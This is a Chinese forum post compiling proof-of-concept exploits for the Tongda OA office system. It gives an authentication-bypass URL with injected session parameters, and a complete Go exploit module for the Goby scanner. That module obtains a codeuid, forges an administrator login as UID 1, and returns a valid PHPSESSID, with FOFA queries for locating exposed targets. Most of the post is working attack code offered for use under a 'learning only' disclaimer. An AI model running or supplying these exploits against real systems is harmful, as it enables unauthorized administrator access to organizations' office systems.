通达漏洞 PoC 整理

吉沃运营专员 · 发表于 2022-8-4 10:34:07

本文内容为互联网上收集，禁止用于非法用途，仅供学习使用！

1、通达 OA 登录认证绕过

URL：

/module/retrieve_pwd/header.inc.php?_ZQA_ID=3fb5b8eadff9c793

复制代码

Payload：

SESSION%5BLOGIN_THEME%5D=15&_SESSION%5BLOGIN_USER_ID%5D=1&SESSION%5BLOGIN_UD%5D=1

复制代码

2、通达 OA 任意用户登陆漏洞

package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"regexp"
"strings"
)
func init() {
expJson := `{
"Name": "Tongda OA Arbitrary User Login Vulnerability",
"Description": "Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices. Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations. ",
"Product": "Tongda-OA",
"Homepage": "https://www.tongda2000.com/",
"DisclosureDate": "2021-05-20",
"Author": "su18@javaweb.org",
"FofaQuery": "body="/static/templates/2013_01/index.css/" || body="javascript:document.form1.UNAME.focus()" || body="href=\\"/static/images/tongda.ico\\"" || body="<link rel=\\"shortcut icon\\" href=\\"/images/tongda.ico\\" />" || (body="OA提示：不能登录OA" && body="紧急通知：今日10点停电") || title="Office Anywhere 2013" || title="Office Anywhere 2015" || (body="tongda.ico" && (title="OA" || title="办公")) || body="class=\\"STYLE1\\">新OA办公系统"",
"GobyQuery": "body="/static/templates/2013_01/index.css/" || body="javascript:document.form1.UNAME.focus()" || body="href=\\"/static/images/tongda.ico\\"" || body="<link rel=\\"shortcut icon\\" href=\\"/images/tongda.ico\\" />" || (body="OA提示：不能登录OA" && body="紧急通知：今日10点停电") || title="Office Anywhere 2013" || title="Office Anywhere 2015" || (body="tongda.ico" && (title="OA" || title="办公")) || body="class=\\"STYLE1\\">新OA办公系统"",
"Level": "3",
"Impact": "Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations. ",
"Recommendation": "<a href="https://www.tongda2000.com/" target="_blank">Please follow the manufacturer's website to update it in time. https://www.tongda2000.com/</a> ",
"References": [
"https://fofa.so/"
],
"Is0day": true,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"Login Bypass"
],
"VulType": [
"Login Bypass"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.0",
"Translation": {
"CN": {
"Name": "通达 OA 任意用户登陆漏洞",
"Product": "通达-OA",
"Description": "通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。 通达存在任意用户登陆漏洞，攻击者可以通过指定接口登陆任意用户，获取后台管理权限，直接登录后台进行敏感操作。",
"Recommendation": "请联系官方厂商进行更新。<a href="https://www.tongda2000.com/" target="_blank">https://www.tongda2000.com/</a> ",
"Impact": "通达存在任意用户登陆漏洞，攻击者可以通过指定接口登陆任意用户，获取后台管理权限，直接登录后台进行敏感操作。 ",
"VulType": [
"登录绕过"
],
"Tags": [
"登录绕过"
]
},
"EN": {
"Name": "Tongda OA Arbitrary User Login Vulnerability",
"Product": "Tongda-OA",
"Description": "Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices. Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations. ",
"Recommendation": "<a href="https://www.tongda2000.com/" target="_blank">Please follow the manufacturer's website to update it in time. https://www.tongda2000.com/</a> ",
"Impact": "Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations. ",
"VulType": [
"Login Bypass"
],
"Tags": [
"Login Bypass"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
checkIsTongdaOA1231234 := func(host *httpclient.FixUrl) bool {
requestConfig := httpclient.NewGetRequestConfig("/inc/expired.php")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "tongda")
}
return false
}
getTongdaCodeUID435345 := func(host *httpclient.FixUrl) string {
requestConfig := httpclient.NewGetRequestConfig("/ispirit/login_code.php")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
if resp.StatusCode == 200 && strings.Contains(resp.RawBody, ""codeuid"") {
return regexp.MustCompile(`\{"codeuid":"\{(.*?)}"`).FindStringSubmatch(resp.RawBody)[1]
}
}
return ""
}
getTongdaPHPSESSID4564234 := func(codeuid string, host *httpclient.FixUrl) string {
requestConfig := httpclient.NewPostRequestConfig("/logincheck_code.php")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
requestConfig.Header.Store("Content-type", "application/x-www-form-urlencoded")
requestConfig.Data = "UID=1&CODEUID=_PC{" + codeuid + "}"
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
if resp.StatusCode == 200 && strings.Contains(resp.RawBody, ""status":1") && strings.Contains(resp.RawBody, ""url":"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") {
return regexp.MustCompile(`Set-Cookie: PHPSESSID=(.*?);`).FindStringSubmatch(resp.HeaderString.String())[1]
}
}
return ""
}
exploitTongda45321 := func(phpsessionid string, host *httpclient.FixUrl) bool {
// 攻击 URL
requestConfig := httpclient.NewGetRequestConfig("/general/")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
requestConfig.Timeout = 15
requestConfig.Header.Store("Cookie", "PHPSESSID="+phpsessionid)
// 发送攻击请求
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
return resp.StatusCode == 302 && strings.Contains(resp.Utf8Html, "tongdainfo")
}
return false
}
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
if checkIsTongdaOA1231234(u) {
codeuid := getTongdaCodeUID435345(u)
if codeuid != "" {
phpsessionid := getTongdaPHPSESSID4564234(codeuid, u)
if phpsessionid != "" {
return exploitTongda45321(phpsessionid, u)
}
}
}
return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
if checkIsTongdaOA1231234(expResult.HostInfo) {
codeuid := getTongdaCodeUID435345(expResult.HostInfo)
if codeuid != "" {
phpsessionid := getTongdaPHPSESSID4564234(codeuid, expResult.HostInfo)
if phpsessionid != "" {
if exploitTongda45321(phpsessionid, expResult.HostInfo) {
expResult.Success = true
expResult.Output = "登陆成功，使用如下 session 即可登陆：" + phpsessionid
}
}
}
}
return expResult
},
))
}

复制代码

		自动登录	找回密码
密码			立即注册

账号		自动登录	找回密码
密码			立即注册

[2022HW] 通达漏洞 PoC 整理

1、通达 OA 登录认证绕过

2、通达 OA 任意用户登陆漏洞

相关帖子

浏览过的版块

论坛管理